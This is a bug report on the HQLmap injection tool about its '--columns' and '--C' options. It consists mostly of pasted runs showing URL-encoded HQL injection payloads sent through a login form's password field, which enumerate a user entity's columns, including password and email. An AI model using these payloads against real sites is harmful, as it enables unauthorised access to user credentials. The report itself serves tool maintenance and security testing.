HQLmap
HQLmap copied to clipboard
Published
20 hours ago •
PaulSec
PaulSec
parameter '--columns' and '--C' do not work without parameter '--tables'
Description
There is some Logical problems with parameter '--tables'. The problem just as the issues' title.
Detail
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 459, in <module>
find_columns(opts.file_column, opts.table)
File "X:\hqlmap\HQLmap.py", line 161, in find_columns
find_column(table_name, column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C
hdPassWord
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 471, in <module>
find_column(opts.table, opts.column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C
hdPassWord --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.hdPassWord%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Hdpassword has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 459, in <module>
find_columns(opts.file_column, opts.table)
File "X:\hqlmap\HQLmap.py", line 161, in find_columns
find_column(table_name, column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.username%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Username has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.password%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Password has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.status%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Status has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.user_id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column User_Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.email%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Email has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.firstname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Firstname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.lastname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Lastname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
